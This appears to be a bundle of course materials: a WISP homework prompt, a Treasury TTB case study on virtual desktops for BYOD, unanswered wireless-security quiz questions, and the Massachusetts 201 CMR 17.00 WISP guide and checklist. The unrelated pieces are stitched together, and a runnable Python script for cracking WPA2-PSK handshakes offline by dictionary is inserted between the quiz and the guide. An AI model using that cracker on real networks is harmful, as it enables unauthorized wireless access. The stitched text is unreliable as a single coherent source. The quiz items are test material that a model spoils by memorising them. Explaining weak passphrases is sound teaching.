Read over the WISP Compliance Checklist and Guidelines, and write at least 1-2 pages on how WISP regulation
applies to your company. If your company is not regulated under WISP, explain how it would apply to a
potential employer.
Alcohol and Tobacco Tax and Trade Bureau (TTB) Virtual Desktop
Allowing Bring Your Own Device with Minimal Policy or Legal Implications
August 13, 2012
Chief Information Officer
Department of the Treasury
Alcohol and Tobacco Tax and Trade Bureau (TTB)
The Alcohol and Tobacco Tax and Trade Bureau (TTB) decided to reduce the costs, time and effort required to
refresh desktop and laptop computers used for client computing needs. TTB has a widely dispersed workforce with
many personnel working from home full time and over 80 percent of the workforce regularly teleworking.
Replacing desktop and laptop computers every 3 to 4 years cost TTB about $2 million and disrupted the IT program
and business users for several months. TTB determined that the best solution was to centralize all client computing
power and applications, user data, and user settings and allow access to TTB resources by thin client computing
devices. A thin client is a computing device or program that relies on another device for computational
power. Currently about 70 percent of TTB personnel use thin client devices to access all TTB applications and data.
TTB desktop and laptop computers were due for refresh this year. However, the virtual desktop solution allowed
TTB to avoid the expense of replacing hardware. The savings achieved paid for TTB’s virtual desktop
implementation – which cost approximately $800,000 – and saved TTB $1.2 million.
TTB realized additional savings by developing a Linux USB device that can be used to turn old desktop and laptop
computers into thin client computing devices for approximately $10 per device. The TTB virtual desktop/thin client
implementation uses a small browser plugin, freely available for almost every operating system, which simply turns
the end user device into a viewer and controller of the virtual desktop running in the TTB computer rooms. No
data touches the end user device. As a result, the TTB virtual desktop implementation has the significant additional
benefit of delivering every TTB application, with user data, to a wide range of user devices without the legal and
policy implications that arise from delivering data to or allowing work to be accomplished directly on a personal
TTB was created as an independent bureau in the Department of the Treasury on January 24, 2003, by the
Homeland Security Act of 2002. When TTB was established, all information technology (IT) resources, including
capital assets, IT personnel and the funding to procure equipment and to develop core business applications
remained with the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF). TTB was funded at a level sufficient
only to reimburse ATF for existing service. No funding was provided for the initial purchase or subsequent
replacement of any of the equipment required to establish and operate TTB’s IT Systems. In FY 2005 TTB
established an independent IT operation with no base funding to refresh infrastructure equipment.
TTB has a very dispersed workforce with many personnel working from home full time and over 80 percent of the
workforce regularly teleworking. Replacing desktop and laptop computers every 3 to 4 years cost TTB about $2
million and disrupted the IT program and business users for several months. TTB decided to reduce the costs, time,
and effort required to refresh client desktop and laptop computers. After considering several solutions, TTB
determined that it would centralize all client computing power and applications, user data, and user settings to
allow access to these resources through thin client computing devices. A thin client is a computing device or
program that relies on another device for computational power.
With limited funding to invest in a completely new infrastructure for the virtual desktop implementation, TTB
examined its existing hardware, software and technical expertise to determine the path most likely to succeed and
achieve the objectives of providing central access to all IT resources while achieving significant savings.
TTB attained considerable success with server virtualization. Approximately 80 percent of the Windows Servers
and 20 percent of the Sun Solaris servers at TTB had been virtualized. With this success in hand, TTB was confident
that a virtual desktop infrastructure could be built without purchasing numerous physical servers. The
infrastructure required to deliver virtual desktop could itself be largely virtualized.
Because TTB was established in 2003 with a significant number of personnel working full time from home, it was
imperative from the beginning to support those personnel with a robust remote access capability. Additionally,
TTB wanted to take advantage of its investment in Citrix licenses and the significant expertise its technical
personnel had gained with the Citrix product suite as they supported remote access. The Citrix virtual desktop
offering uses a small browser plugin called Citrix Receiver, which is freely available for download and turns
almost any device into a thin client. This solution was selected because the Citrix Receiver allows TTB to create thin
client devices and support BYOD (initially home computers).
The currently deployed solution has 2 active sites, each with 3 physical servers. Either site can support the entire
customer base. The rest of the virtual desktop servers are virtualized. In essence, TTB supports the entire
population (650 personnel total in TTB, CDFI, and contractors) with 6 physical servers. Figure 1 is a conceptual view
of the TTB virtual desktop.
Today about 70 percent of TTB personnel access all TTB computing resources through thin devices, provided by
TTB as well as BYOD. There is no typical user setup. If the desired user configuration works, TTB allows it. As an
example, a TTB attorney uses a thin client device in the office, a BYOD Mac personal computer when working from
home, and a BYOD iPad device when on the road. Several TTB personnel use BYOD Kindle Fire devices for
occasional access, for example, if they need to check email when out of the office or they need to approve a time
card that was not ready when they were in the office.
The rapid pace of change in the mobile device market makes the virtual desktop solution particularly attractive.
Because no data touches the user device, there is no need for a mobile device management (MDM) solution on a
non-TTB device. As soon as a device is made available to the public it can be used to access TTB applications and data.
The Droid Razr smart phone with a Motorola Lapdock 500 is an example of such a device. A user who has a
government-provided smart phone (MDM installed) with a Lapdock would not need an additional computing
device. Further, a user who had the same setup, minus the MDM, also could work full time with this BYOD. The
ASUS Transformer is another example of a newly available mobile device that has a form factor usable for full-time
work. The multiple-device access capability of virtual desktop allows TTB to move toward providing a single device
The final result, which is likely the greatest benefit of the TTB Virtual Desktop solution relative to BYOD, is the
minimization or elimination of complex legal and policy issues. Because no data touches the BYOD device and no
work is physically accomplished on the BYOD equipment, all requests for discovery of information from a user's
computer can be satisfied without having to recover anything from the user's personal device.
The primary TTB BYOD lesson learned is to avoid allowing data to touch the personal device. Having all data,
settings and processing in a central location and using the BYOD device simply as a viewer significantly
simplifies the legal and policy implications. Note that "no data touches the device" is a statement about data at
rest: the display stream, keystrokes, and any clipboard, client-drive or printer redirection that the Citrix policies
permit still pass through the personal device, so those redirections must be disabled for BYOD sessions, and a
compromised endpoint can still observe what the user sees and types.
VMware for server virtualization
6 Dell R910 physical servers
Citrix XenDesktop, XenApp, XenClient (pilot), Receiver, Citrix Provisioning Services
NetScalers for remote access
Robust Storage Area Network and Core Network required
References to the product and/or service names of the hardware and/or software products used in this case
study do not constitute an endorsement of such hardware and/or software products.
1. Bluetooth falls under the category of
a. local area network (LAN)
b. short area network (SAN)
c. paired-device network (PDN)
d. personal area network (PAN)
2. A Bluetooth network that contains one master and at least one
slave using the same RF channel forms a ______.
3. ______ is the unauthorized access of information from a wireless device
through a Bluetooth connection.
b. Bluetooth snatching
c. Bluetooth spoofing
4. The ______ standard specifies a maximum rated speed of
54 Mbps using the 5 GHz spectrum.
5. Each of the following is an advantage of IEEE 802.11n except
a. smaller coverage area
b. faster speed
c. less interference
d. stronger security
6. Which of the following is not found in a residential WLAN?
a. intrusion detection system (IDS)
d. dynamic host configuration protocol (DHCP)
7. Which of the following is not a requirement for war driving?
a. Wireless NIC adapter
c. GPS receiver
d. mobile computer device
8. The primary design of a(n) ______ is to capture the
transmissions from legitimate users.
rogue access point
9. Which of the following is a vulnerability of MAC address filtering?
a. The user must enter the MAC.
b. APs use IP addresses instead of MACs.
c. Not all operating systems support MACs.
d. MAC addresses are initially exchanged between wireless
devices and the AP in an unencrypted format.
10. Each of the following is a limitation of turning off the SSID
broadcast from an AP except
a. the SSID can easily be discovered, even when it is not
contained in beacon frames, because it still is transmitted in
other management frames sent by the AP
b. turning off the SSID broadcast may prevent users from being
able to freely roam from one AP coverage area to another
c. some versions of operating systems favor a network
broadcasting an SSID over one that does not
d. users can more easily roam from one WLAN to another
11. The primary weakness of wired equivalent privacy (WEP) is
a. its usage creates a detectable pattern
b. initialization vectors (IVs) are difficult for users to manage
c. it only functions on specific brands of APs
d. it slows down a WLAN from 104 Mbps to 16 Mbps
12. The two models for personal wireless security developed by the
Wi-Fi Alliance are Wi-Fi Protected Access (WPA) and ______.
Protected Wireless Security (WPS)
Postshared Key Protection (PKP)
Wi-Fi Protected Access 2 (WPA2)
13. WPA replaces WEP with ______.
a. Temporal Key Integrity Protocol (TKIP)
b. Cyclic Redundancy Check (CRC)
c. Message Integrity Check (MIC)
14. A preshared key (PSK) of fewer than ______ characters may be subject to
an attack if that key is a common dictionary word.
15. A WEP key that is 128 bits in length ______.
a. cannot be used on access points that use passphrases.
b. is less secure than a WEP key of 64 bits because shorter keys
c. has an initialization vector (IV) that is the same length as a
WEP key of 64 bits.
d. cannot be cracked because it is too long.
16. AES-CCMP is the encryption protocol standard used in ______.
b. IEEE 802.11
17. What is the Extensible Authentication Protocol (EAP)?
a. A subset of WPA2
b. The protocol used in TCP/IP for authentication
c. A framework for transporting authentication protocols
d. A technology used by IEEE 802.11 for encryption
18. Which technology should be used instead of LEAP?
19. Each of the following is a type of wireless AP probe except ______.
a. wireless device probe
b. dedicated probe
c. AP probe
d. WNIC probe
20. The most flexible approach for a wireless VLAN is to have which
device separate the packets?
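The short-PSK question (14) is the one item in this set that a worked example genuinely clarifies. The following Python, added here as an illustration and not part of the textbook material, shows why a passphrase that is short or a dictionary word can be recovered offline from a single captured 4-way handshake: the PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID, the PTK is derived from the PMK plus values that are sent in the clear (both MAC addresses and both nonces), and the MIC on message 2 lets an attacker check each candidate without ever talking to the access point. The SSID, MAC addresses, nonces, wordlist and the minimal EAPOL-Key frame layout are constructed for the example; the key derivation and MIC computation follow IEEE 802.11i (key descriptor version 2, as used by WPA2/AES-CCMP).

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake (constructed example)."""
import hashlib
import hmac
import struct

# Constructed sample values standing in for what a sniffer sees in the clear:
# the SSID from beacons, MAC addresses and nonces from the handshake frames.
SSID = "ExampleNet"
AA = bytes.fromhex("001122334455")      # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")     # supplicant (client) MAC
ANONCE = bytes(range(32))               # nonce the AP sends in message 1
SNONCE = bytes(range(32, 64))           # nonce the client sends in message 2
WORDLIST = ["password", "letmein", "sunshine1", "qwerty123"]   # constructed wordlist

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public handshake values; its first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key frame for message 2 of 4 (constructed layout, no key data)."""
    body = struct.pack(">BHH", 2, 0x010A, 16)   # descriptor type RSN; key info: v2, pairwise, MIC set; key length
    body += struct.pack(">Q", 1)                # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", 0)          # key MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X header: version 2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def simulate_capture(true_passphrase: str) -> bytes:
    """Stand-in for a sniffed message 2: the real client signs it with the KCK derived from the true PSK."""
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def crack_psk(ssid: str, msg2: bytes, wordlist):
    """Try each candidate offline; the one whose KCK reproduces the captured MIC is the PSK (or None)."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), AA, SPA, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = simulate_capture("sunshine1")   # the "victim" network uses a 9-character dictionary-style PSK
    print("recovered PSK:", crack_psk(SSID, captured, WORDLIST))
```

Each candidate costs 4096 HMAC-SHA1 iterations plus the PTK and MIC work, which is why a long random passphrase puts the search out of reach while a short dictionary word falls after a handful of guesses. The SSID acts as the salt, so the same passphrase yields a different PMK on a different network, and precomputed PMK tables only help against common SSIDs.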
COMMONWEALTH OF MASSACHUSETTS
OFFICE OF CONSUMER AFFAIRS AND BUSINESS REGULATION
10 Park Plaza – Suite 5170, Boston MA 02116
(617) 973-8700 FAX (617) 973-8799
DEVAL L. PATRICK
SECRETARY OF HOUSING AND
TIMOTHY P. MURRAY
A Small Business Guide:
Formulating A Comprehensive Written Information Security Program
While the contents of any comprehensive written information security program required
by 201 CMR 17.00 must always satisfy the detailed provisions of those regulations; and while
the development of each individual program will take into account (i) the size, scope and type of
business of the person obligated to safeguard the personal information under such comprehensive
information security program, (ii) the amount of resources available to such person, (iii) the
amount of stored data, and (iv) the need for security and confidentiality of both consumer and
employee information, the Office of Consumer Affairs and Business Regulation is issuing this
guide to help small businesses in their compliance efforts. This Guide is not a substitute for
compliance with 201 CMR 17.00. It is simply a tool designed to aid in the development of a
written information security program for a small business, including the self employed, that
handles “personal information.”
Wherever there is a conflict between this guide and the provisions of 201 CMR 17.00, the latter governs. We set
out below this "guide" to devising a security program (references below to "we" and "our" are references to the
small business to whom the real WISP will relate):
COMPREHENSIVE WRITTEN INFORMATION SECURITY PROGRAM
Our objective, in the development and implementation of this comprehensive written
information security program (“WISP”), is to create effective administrative, technical and
physical safeguards for the protection of personal information of residents of the Commonwealth
of Massachusetts, and to comply with obligations under 201 CMR 17.00. The WISP sets forth
our procedure for evaluating our electronic and physical methods of accessing, collecting,
storing, using, transmitting, and protecting personal information of residents of the
Commonwealth of Massachusetts. For purposes of this WISP, “personal information” means a
Massachusetts resident's first name and last name or first initial and last name in combination
with any one or more of the following data elements that relate to such resident: (a) Social
Security number; (b) driver's license number or state-issued identification card number; or (c)
financial account number, or credit or debit card number, with or without any required security
code, access code, personal identification number or password, that would permit access to a
resident’s financial account; provided, however, that “personal information” shall not include
information that is lawfully obtained from publicly available information, or from federal, state
or local government records lawfully made available to the general public.
The purpose of the WISP is to:
(a) Ensure the security and confidentiality of personal information;
(b) Protect against any anticipated threats or hazards to the security or integrity of such information;
(c) Protect against unauthorized access to or use of such information in a manner that creates a
substantial risk of identity theft or fraud.
In formulating and implementing the WISP, we will (1) identify reasonably foreseeable internal
and external risks to the security, confidentiality, and/or integrity of any electronic, paper or
other records containing personal information; (2) assess the likelihood and potential damage of
these threats, taking into consideration the sensitivity of the personal information; (3) evaluate
the sufficiency of existing policies, procedures, customer information systems, and other
safeguards in place to control risks; (4) design and implement a WISP that puts safeguards in
place to minimize those risks, consistent with the requirements of 201 CMR 17.00; and (5)
regularly monitor the effectiveness of those safeguards:
DATA SECURITY COORDINATOR:
We have designated ____________________ to implement, supervise and maintain the
WISP. That designated employee (the “Data Security Coordinator”) will be responsible for:
a. Initial implementation of the WISP;
b. Training employees;
c. Regular testing of the WISP’s safeguards;
d. Evaluating the ability of each of our third party service providers to implement and maintain
appropriate security measures for the personal information to which we have permitted them
access, consistent with 201 CMR 17.00; and requiring such third party service providers by
contract to implement and maintain appropriate security measures.
e. Reviewing the scope of the security measures in the WISP at least annually, or whenever there
is a material change in our business practices that may implicate the security or integrity of
records containing personal information.
f. Conducting an annual training session for all owners, managers, employees and independent
contractors, including temporary and contract employees who have access to personal
information on the elements of the WISP. All attendees at such training sessions are required to
certify their attendance at the training, and their familiarity with the firm’s requirements for
ensuring the protection of personal information.
To combat internal risks to the security, confidentiality, and/or integrity of any electronic,
paper or other records containing personal information, and evaluating and improving, where
necessary, the effectiveness of the current safeguards for limiting such risks, the following
measures are mandatory and are effective immediately. To the extent that any of these measures
require a phase-in period, such phase-in must be completed on or before March 1, 2010:
A copy of the WISP must be distributed to each employee who shall,
upon receipt of the WISP, acknowledge in writing that he/she has received
a copy of the WISP.
There must be immediate retraining of employees on the detailed
provisions of the WISP.
Employment contracts must be amended immediately to require all
employees to comply with the provisions of the WISP, and to prohibit any
nonconforming use of personal information during or after employment;
with mandatory disciplinary action to be taken for violation of security
provisions of the WISP (The nature of the disciplinary measures may depend
on a number of factors including the nature of the violation and the nature
of the personal information affected by the violation).
The amount of personal information collected should be limited to
that amount reasonably necessary to accomplish our legitimate business
purposes, or necessary for us to comply with other state or federal regulations.
Access to records containing personal information shall be limited
to those persons who are reasonably required to know such information in
order to accomplish our legitimate business purpose or to enable us to
comply with other state or federal regulations.
A user ID must be blocked after multiple unsuccessful attempts to gain
access with it.
All security measures shall be reviewed at least annually, or
whenever there is a material change in our business practices that may
reasonably implicate the security or integrity of records containing
personal information. The Data Security Coordinator shall be responsible
for this review and shall fully apprise management of the results of that
review and any recommendations for improved security arising out of that review.
Terminated employees must return all records containing personal
information, in any form, that may at the time of such termination be in
the former employee’s possession (including all such information stored
on laptops or other portable devices or media, and in files, records, work
A terminated employee’s physical and electronic access to
personal information must be immediately blocked. Such terminated
employee shall be required to surrender all keys, IDs or access codes or
badges, business cards, and the like, that permit access to the firm’s
premises or information. Moreover, such terminated employee’s remote
electronic access to personal information must be disabled; his/her
voicemail access, e-mail access, internet access, and passwords must be
invalidated. The Data Security Coordinator shall maintain a highly
secured master list of all lock combinations, passwords and keys.
Current employees' user IDs and passwords must be changed
Access to personal information shall be restricted to active users
and active user accounts only.
Employees are encouraged to report any suspicious or
unauthorized use of customer information.
Whenever there is an incident that requires notification under
M.G.L. c. 93H, §3, there shall be an immediate mandatory post-incident
review of events and actions taken, if any, with a view to determining
whether any changes in our security practices are required to improve the
security of personal information for which we are responsible.
Employees are prohibited from keeping open files containing
personal information on their desks when they are not at their desks.
At the end of the work day, all files and other records containing
personal information must be secured in a manner that is consistent with
the WISP’s rules for protecting the security of personal information.
Each department shall develop rules (bearing in mind the business
needs of that department) that ensure that reasonable restrictions upon
physical access to records containing personal information are in place,
including a written procedure that sets forth the manner in which physical
access to such records in that department is to be restricted; and each
department must store such records and data in locked facilities, secure
storage areas or locked containers.
Access to electronically stored personal information shall be
electronically limited to those employees having a unique log-in ID; and
re-log-in shall be required when a computer has been inactive for more
than a few minutes.
Visitors’ access must be restricted to one entry point for each
building in which personal information is stored, and visitors shall be
required to present a photo ID, sign-in and wear a plainly visible
“GUEST” badge or tag. Visitors shall not be permitted to visit unescorted
any area within our premises that contains personal information.
Paper or electronic records (including records stored on hard
drives or other electronic media) containing personal information shall be
disposed of only in a manner that complies with M.G.L. c. 93I.
To combat external risks to the security, confidentiality, and/or integrity of any
electronic, paper or other records containing personal information, and evaluating and
improving, where necessary, the effectiveness of the current safeguards for limiting such risks,
the following measures must be completed on or before March 1, 2010:
There must be reasonably up-to-date firewall protection and
operating system security patches, reasonably designed to maintain the
integrity of the personal information, installed on all systems processing personal information.
There must be reasonably up-to-date versions of system security
agent software which must include malware protection and reasonably
up-to-date patches and virus definitions, installed on all systems
processing personal information.
To the extent technically feasible, all personal information stored
on laptops or other portable devices must be encrypted, as must all records
and files transmitted across public networks or wirelessly, to the extent
technically feasible. Encryption here means the transformation of data into
a form in which meaning cannot be assigned without the use of a confidential
process or key, unless further defined by regulation by the Office of Consumer Affairs
and Business Regulation.
All computer systems must be monitored for unauthorized use of or
access to personal information.
There must be secure user authentication protocols in place, including:
(1) protocols for control of user IDs and other identifiers; (2) a reasonably
secure method of assigning and selecting passwords, or use of unique identifier
technologies, such as biometrics or token devices; (3) control of data security
passwords to ensure that such passwords are kept in a location and/or format that
does not compromise the security of the data they protect.
CHARLES D. BAKER
SECRETARY OF HOUSING AND
KARYN E. POLITO
COMMONWEALTH OF MASSACHUSETTS
JOHN C. CHAPMAN
Office of Consumer Affairs and Business Regulation
10 Park Plaza, Suite 5170, Boston, MA 02116
(617) 973-8700 FAX (617) 973-8799
201 CMR 17.00 COMPLIANCE CHECKLIST
The Office of Consumer Affairs and Business Regulation has compiled this checklist to help small
businesses in their effort to comply with 201 CMR 17.00. This Checklist is not a substitute for
compliance with 201 CMR 17.00. Rather, it is designed as a useful tool to aid in the development of
a written information security program for a small business or individual that handles “personal
information.” Each item, presented in question form, highlights a feature of 201 CMR 17.00 that will
require proactive attention in order for a plan to be compliant.
The Comprehensive Written Information Security Program (WISP)
Do you have a comprehensive, written information security program ("WISP") applicable to all
records containing personal information about a resident of the Commonwealth of Massachusetts?
Does the WISP include administrative, technical, and physical safeguards for PI protection?
Have you designated one or more employees to maintain and supervise WISP implementation?
Have you identified the paper, electronic and other records, computing systems, and storage
media, including laptops and portable devices, that contain personal information?
Have you chosen, as an alternative, to treat all your records as if they all contained PI?
Have you identified and evaluated reasonably foreseeable internal and external risks to paper and
electronic records containing PI?
Have you evaluated the effectiveness of current safeguards?
Does the WISP include regular ongoing employee training, and procedures for monitoring
Does the WISP include disciplinary measures for violators?
Does the WISP include policies and procedures for when and how records containing PI should
be kept, accessed or transported off your business premises?
Does the WISP provide for immediately blocking terminated employees' physical and electronic
access to PI records (including deactivating their passwords and user names)?
Have you taken reasonable steps to select and retain a third-party service provider that is capable
of maintaining appropriate security measures consistent with 201 CMR 17.00?
Have you required such third-party service provider by contract to implement and maintain such
appropriate security measures?
Is the amount of PI that you have collected limited to the amount reasonably necessary to
accomplish your legitimate business purposes, or to comply with state or federal regulations?
Is the length of time that you are storing records containing PI limited to the time reasonably
necessary to accomplish your legitimate business purpose or to comply with state or federal
regulations?
legitimate business purpose, or in order to comply with state or federal regulations?
In your WISP, have you specified the manner in which physical access to PI records is to be restricted?
Have you stored your records and data containing PI in locked facilities, storage areas or containers?
Have you instituted a procedure for regularly monitoring to ensure that the WISP is operating in a
manner reasonably calculated to prevent unauthorized access to or unauthorized use of PI; and for
upgrading it as necessary?
Are your security measures reviewed at least annually, or whenever there is a material change in
business practices that may affect the security or integrity of PI records?
Do you have in place a procedure for documenting any actions taken in connection with any
breach of security; and does that procedure require post-incident review of events and actions
taken to improve security?
Additional Requirements for Electronic Records
Do you have in place secure authentication protocols that provide for:
o Control of user IDs and other identifiers?
o A reasonably secure method of assigning/selecting passwords, or for use of unique
identifier technologies (such as biometrics or token devices)?
o Control of data security passwords such that passwords are kept in a location and/or
format that does not compromise the security of the data they protect?
o Restricting access to PI to active users and active user accounts?
o Blocking access after multiple unsuccessful attempts to gain access?
Do you have secure access control measures that restrict access, on a need-to-know basis, to PI
records and files?
Do you assign unique identifications plus passwords (which are not vendor supplied default
passwords) to each person with computer access; and are those IDs and passwords reasonably
designed to maintain the security of those access controls?
Do you, to the extent technically feasible, encrypt all PI records and files that are transmitted
across public networks, and that are to be transmitted wirelessly?
Do you, to the extent technically feasible, encrypt all PI stored on laptops or other portable devices?
Do you have monitoring in place to alert you to the occurrence of unauthorized use of or access to PI?
On any system that is connected to the Internet, do you have reasonably up-to-date firewall
protection for files containing PI; and operating system security patches to maintain the integrity
of the PI?
Do you have reasonably up-to-date versions of system security agent software (including
malware protection) and reasonably up-to-date security patches and virus definitions?
Do you have in place training for employees on the proper use of your computer security system,
and the importance of PI security?